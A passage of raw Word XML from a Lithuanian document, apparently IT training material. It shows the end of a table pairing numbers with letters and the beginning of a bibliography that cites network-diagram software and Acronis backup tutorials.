            <w:tcW w:w="2407" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3E01B646" w14:textId="62BE5F9A" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62BA7FFA" w14:textId="3C668F0E" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="41C2D368" w14:textId="77777777" w:rsidTr="00A203DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CB9C6D1" w14:textId="77777777" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2E0D4214" w14:textId="77777777" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4DACC05F" w14:textId="458AEC72" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="775CE4CF" w14:textId="7D9D9B84" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="2814CC37" w14:textId="77777777" w:rsidTr="00A203DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A352082" w14:textId="77777777" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="132D125E" w14:textId="77777777" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="43264C48" w14:textId="22640972" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F493F79" w14:textId="72CB22DE" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="63E33724" w14:textId="77777777" w:rsidTr="00A203DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40EB29DB" w14:textId="77777777" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="18B1822A" w14:textId="77777777" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6CDB434C" w14:textId="76059149" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32B1A3BC" w14:textId="4EA39A6D" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="087659E5" w14:textId="77777777" w:rsidTr="00A203DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EC743BC" w14:textId="77777777" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5D7E4D1A" w14:textId="77777777" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5160B510" w14:textId="756819A4" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="060EFFC2" w14:textId="35ACA4CF" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="199BC6B4" w14:textId="77777777" w:rsidTr="00A203DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F63644F" w14:textId="77777777" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="630BF46D" w14:textId="77777777" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5CACEF9C" w14:textId="3B3B7955" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="717110BB" w14:textId="73AA8D70" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A5C28" w:rsidRPr="005A5C28" w14:paraId="3703E833" w14:textId="77777777" w:rsidTr="00A203DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0822A91B" w14:textId="77777777" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="34BE2FC0" w14:textId="77777777" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7F3AA267" w14:textId="7101008A" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07753877" w14:textId="4E7E9BE7" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B5886" w:rsidRPr="005A5C28" w14:paraId="1CF00B4B" w14:textId="77777777" w:rsidTr="00A203DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BEFC47F" w14:textId="77777777" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2851F90E" w14:textId="77777777" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005A5C28">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6BCC5B69" w14:textId="35560EE8" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2407" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19DBB65F" w14:textId="16B192B6" w:rsidR="000B5886" w:rsidRPr="005A5C28" w:rsidRDefault="000B5886" w:rsidP="0089230F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1214E208" w14:textId="77777777" w:rsidR="00500B87" w:rsidRPr="005A5C28" w:rsidRDefault="00500B87" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C598E96" w14:textId="4A3944E5" w:rsidR="00B0488D" w:rsidRPr="005A5C28" w:rsidRDefault="00B0488D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="18" w:name="_Toc500413798"/>
      <w:r w:rsidR="28D6C7E5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Literatūros sąrašas</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="42C6D796" w14:textId="77777777" w:rsidR="00081361" w:rsidRPr="005A5C28" w:rsidRDefault="00081361" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42C01EDE"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15 Best Network Diagram Software &amp; Topology Mapper Tools (Free&amp;Paid). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Networks Training</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId289">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://www.networkstraining.com/best-network-diagram-software/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5F6CFF64"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Acronis True Image 2019: how to back up files or disks. (2019, gruodžio 30). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Acronis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą:</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId290" w:history="1">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsia="Times New Roman"/>
          </w:rPr>
          <w:t>https://kb.acronis.com/content/61645</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0B13FB2D" w14:textId="08EA8FC1" w:rsidR="006F021B"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Acronis True Image 2020 Review &amp; Tutorial. (2020, gegužės 22). </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">AskMe4Tecn. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Prieiga per internetą:</w:t>
